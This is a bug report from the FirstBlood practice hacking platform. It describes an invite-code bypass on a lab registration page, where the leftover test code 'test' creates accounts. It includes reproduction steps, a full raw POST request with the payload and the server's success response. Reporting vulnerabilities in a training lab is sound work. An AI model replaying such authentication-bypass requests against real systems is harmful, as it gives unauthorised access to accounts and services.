FirstBlood-#377 — Unique invite code bypass
This issue was discovered on FirstBlood v2
On 2021-10-25, vigilante Level 4 reported:
Description
It is possible to create a new account with the test/test credentials instead of using a unique invite code.
Steps to reproduce
- Navigate to services > Doctor login
https://87357338e250-vigilante.a.firstbloodhackers.com/login.php
- Click on the register here url
https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
- Use username:test and unique invite code:test, click on "Secure register".
- You'll will get a message that you've successfully created an account.
Success! Your account has been created with the following credentials:
Username: test
Password: Kpu2K8iIta
POST /register.php HTTP/1.1
Host: 87357338e250-vigilante.a.firstbloodhackers.com
Cookie: doctorAuthed=eyJkb2N0b3JBdXRoIjphdXRoZWR9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: https://87357338e250-vigilante.a.firstbloodhackers.com
Referer: https://87357338e250-vigilante.a.firstbloodhackers.com/register.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Pragma: no-cache
Cache-Control: no-cache
Te: trailers
Connection: close
action=register&username=test&inviteCode=test
Screenshot:
Impact:
It is possible to bypass the unique code requirement, it looks like some test credentials made it to production and we can use the word "test" when creating new accounts.
P3 Medium
Endpoint: /register.php
Parameter: inviteCode=
Payload: test
FirstBlood ID: 24
Vulnerability Type: Auth issues
The old invite code was deleted but when testing FirstBlood v2 the developers accidentally left the test code working.